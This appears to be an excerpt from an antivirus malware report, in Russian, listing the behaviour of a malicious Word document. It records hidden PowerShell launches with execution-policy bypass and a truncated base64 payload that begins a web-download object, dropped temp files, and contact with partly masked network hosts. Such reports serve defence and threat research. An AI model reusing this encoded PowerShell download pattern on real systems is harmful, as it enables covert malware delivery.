Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -NoP -Exec Bypass -NoExit -EC JABpAG4AcwB0AGEAbgBjAGUAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEEAYwB0AGkAdgBhAHQAbwByAF0AOgA6AEMAcgBlAGEAdABlAEkAbgBzAHQAYQBuAGMAZQAoACIAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQB...
- <Текущая директория>\~wrd0000.tmp
- <Текущая директория>\~wrd0001.tmp
- <Текущая директория>\~wrd0000.tmp
- <PATH_SAMPLE>.doc
- '17#.#2.33.145':80
- DNS ASK fo###oudal.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -NoP -Exec Bypass -NoExit -EC JABpAG4AcwB0AGEAbgBjAGUAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEEAYwB0AGkAdgBhAHQAbwByAF0AOgA6AEMAcgBlAGEAdABlAEkAbgBzAHQAYQBuAGMAZQAoACIAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQB...' (со скрытым окном)